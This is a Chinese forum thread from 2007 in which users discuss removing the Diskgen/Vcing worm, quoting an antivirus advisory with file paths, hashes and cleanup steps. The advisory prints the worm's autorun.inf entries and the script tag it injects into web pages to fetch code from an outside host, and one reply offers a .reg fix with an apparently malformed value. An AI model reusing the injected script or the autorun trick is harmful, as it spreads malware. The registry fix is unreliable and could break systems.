Virus.win32.small.p病毒无法删除

lonewolf_lw

提示出先这个C:\WINDOWS\system32\com\smss.exe
删除后重起又出来了
一直这样反复无偿

wangjay1980

system32\com\smss.exe lsass.exe _system~.ini pagefile.pif 瑞星报毒-磁碟机（Worm.Diskgen.GEN2007-02-01 21:37大体看了一下估计有以下行为

*2感染型。。
system32\com\lsass.exe
system32\com\smss.exe

排除\%windows%\和\%program files%\感染exe文件
_system~.ini
pagefile.pif
程序名.exe.log
程序.log
程序名s.~
生成同名.exe



OP_head.exe  49,152+8=49,160字节
OP_tail.exe  49,152 字节


猜想与这贴里的有些相似http://hi.baidu.com/killvir/blog ... 25e4315c6008cd.html



磁碟机（Worm.Diskgen.GEN）瑞星相关信息：http://it.rising.com.cn/Channels ... 0399810d40326.shtml

“磁碟机（Worm.Diskgen.GEN）”病毒：警惕程度★★★☆，蠕虫病毒，通过感染可执行文件传播，依赖系统：WIN 9X/NT/2000/XP。

　　该病毒运行后会在系统目录中COM目录（默认为c:\windows\system32\com）下生成名为lsass.exe及smss.exe文件。该病毒会感染除windows及program files目录下所有的EXE格式可执行文件，会造成用户计算机运算速度缓慢，甚至造成系统蓝屏、死机。由于该病毒编写存在一些问题，可能会造成用户安装的软件被损坏，无法使用。

wangjay1980

CISRT发布Vcing解决方案--感染文件，修改网页，lsass.exe smss.exe2007-01-25 12:40【CISRT2007019】Vcing新变种 感染文件 修改网页 lsass.exe smss.exe 解决方案

档案编号：CISRT2007019
病毒名称：N/A（Kaspersky）
病毒别名：Win32.Troj.Vcing.al.49152（毒霸）
病毒大小：49,152 字节
加壳方式：N/A
样本MD5：ba181d7d9a178e2bf928f95ad2e199ed
样本SHA1：a26027ad76c16e3ed2d8edb3f59125c50b55a580
发现时间：2007.1
更新时间：2007.1.21
关联病毒：
传播方式：可通过文件感染传播，可通过移动磁盘（如U盘）传播，还可通过恶意网页及其它病毒木马下载


技术分析
==========

病毒运行后复制自身到系统目录：
%System%\Com\lsass.exe
同时释放另一个病毒程序用于感染exe文件：
%System%\Com\smss.exe

病毒还向各个磁盘分区复制副本，创建autorun.inf使病毒可通过“自动播放”被运行：
X:\pagefile.pif
X:\AUTORUN.INF

[AutoRun]
open=pagefile.pif
shellexecute=pagefile.pif
shell\Auto\command=pagefile.pif
修改注册表使“隐藏受保护的操作系统文件(推荐)”选项消失：

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="radio"
感染exe文件，被感染exe文件的前端和后端都有病毒插入。

病毒还会修改htm/html/asp/aspx/php/jsp等网页文件，在文件尾部追加脚本代码：

<script src="hxxp://www.yayadown.com/b.js"></script>
脚本代码利用系统漏洞会下载病毒自身更新。


清除步骤
==========

1. 结束病毒进程：
%System%\Com\lsass.exe

2. 删除病毒文件：
%System%\Com\lsass.exe
%System%\Com\smss.exe

3. 恢复被隐藏的“隐藏受保护的操作系统文件(推荐)”选项：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="checkbox"
4. 通过磁盘分区盘符右键菜单中的“打开”进入磁盘分区根目录，删除根目录下的病毒文件：
X:\pagefile.pif
X:\AUTORUN.INF

5. 使用反病毒软件进行全盘扫描清除被病毒感染的exe文件

6. 恢复被修改的网页文件，可以使用反病毒软件清除，也可以使用某些网页编辑工具（比如Dreamweaver）替换被添加代码为空


发布时间：2007-01-24 14:30

lonewolf_lw

5. 使用反病毒软件进行全盘扫描清除被病毒感染的exe文件

6. 恢复被修改的网页文件，可以使用反病毒软件清除，也可以使用某些网页编辑工具（比如Dreamweaver）替换被添加代码为空
5这个卡巴好想不管用啊
6大哥推荐一个给小弟弟用吧   偶是菜菜虫

童年

用这个专杀试试啊

dianliying

谁能告诉个专杀工具啊?谢了

毒来啦

这个病毒很难对付，有两种办法：
第一种：下载个进程管理器，找出问题进程的路径，手动终止LSASS.EXE和exert.exe两个进程（管理器不能终止LSASS.EXE,提示系统进程不能终止），打开msconfig.exe取消LSASS.EXE启动项。删除C:\Documents and Settings\Administrator\Local Settings\temp和Temporary Internet Files下的文件,断开网络后再删除C:\Program Files\Common Files\update文件夹，这里exe类文件已不能运行，新建一个reg文件，输入如下内容：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe]
@="exefile"
"Content Type"="％1，%*"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\PersistentHandler]
@=""

或用工具恢复注册表。
或者http://hi.baidu.com/teyqiu/blog/ ... 2346ec54e72351.html

===============================================
C:\Documents and Settings\Administrator\Local Settings\tempt
这个目录在Windows下是没有的.是不是误输入了!下次要小心些哟!!

dianliying

先用用看,谢

dianliying

进程管理器不能终止LSASS.EXE,一终止就提示系统即将关机,而且启动项里没有LSASS.EXE启动项啊

cbz107

这个工具可以抑制再生